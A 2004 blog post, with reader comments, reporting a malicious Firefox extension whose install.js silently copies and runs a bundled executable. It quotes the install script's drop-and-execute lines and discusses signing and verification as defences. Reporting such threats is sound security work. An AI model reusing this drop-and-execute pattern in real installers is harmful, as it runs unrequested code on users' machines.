« Default Thunderbird theme icons and usability | Main | Deletion of autocomplete results in Firefox, Mozilla 1.7b released »

Malicious XPIs run executable binaries

March 27, 2004

Flexer recently posted his encounter with a website that tried to get him to install a malicious XPI (Firefox extension). Upon the user clicking “Install”, the install.js (the script that performs the actual installation) tries to execute the contained executable, which is xxxtoolbar, as Paradox52525 reports.

Here’s a snippet of the code in the install.js:

var xpiSrc = “istinstall_netscape.exe”;
initInstall(”Adding a File”,
“addFile”,
“1.0.1.7″,
1);
f = getFolder(”Temporary”);
setPackageFolder(f);
addFile(xpiSrc);
execute(xpiSrc,”",false);

Arthur_Dent breaks down exactly what the XPI and the contained executable does in his post.

Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance. For unverified XPIs, warn the user that of that fact, and that the XPI will directly run executable code. Require an extra step of confirmation. That’s what I think at the moment, but there are some pretty good ideas in that thread. It’ll be interesting to see how this is dealt with in the near future.

Follow the discussion on MozillaZine forums.

Update: See relevant bug 238684.

Posted by Chu Yeow at March 27, 2004 SGT | Permalink | | Category: Mozilla

5 Comments & TrackBacks (Add yours)

The paper doll icon that precedes each comment is an idea conceived by Vanessa Tan.

Paper doll icon
Jesse Ruderman's Gravatar

“Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance.”

Verified by whom? mozilla.org?

Posted by: Jesse Ruderman on March 28, 2004 9am

Paper doll icon
0zone's Gravatar

There should be a team that checks packages that are submitted, if the team finds that the packages are ok then they add the file name and md5 of the file to a database that gets checked by the installer. If the installer can’t find the entry then it should display a warning stating that the package could not be verified and ask them if they want to continue (no should be default).

Posted by: 0zone on March 28, 2004 11am

Paper doll icon
Cheah Chu Yeow's Gravatar

Verified by whom? mozilla.org?

I’d say a good, trusted authority is good enough. The people at mozdev.org, David Tenser, mozilla.org are possible candidates.

Posted by: Cheah Chu Yeow on March 28, 2004 11am

Paper doll icon
Minh Nguyễn's Gravatar

I’m not so sure that David Tenser verifying all the XPIs alone would scale too well. :)

Posted by: Minh Nguyễn on March 29, 2004 10am

Paper doll icon
Dark Reflexions's Gravatar

Disappointing
A malicious Firefox .XPI was created I’m just gunna trackback and link you to the blog of a person I know (internet-wise), because his post was very well written. It will be fixed by the Mozilla developement project somehow, but…

Posted by: Dark Reflexions on March 29, 2004 11pm

You can subscribe to the RSS feed for comments on this post.

« Default Thunderbird theme icons and usability | Main | Deletion of autocomplete results in Firefox, Mozilla 1.7b released »

Post a comment

(required)

(required, but never displayed)


You can format your comments using XHTML. Your email address will not be displayed or used for nefarious purposes.

Only following tags are allowed:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


« Default Thunderbird theme icons and usability | Main | Deletion of autocomplete results in Firefox, Mozilla 1.7b released »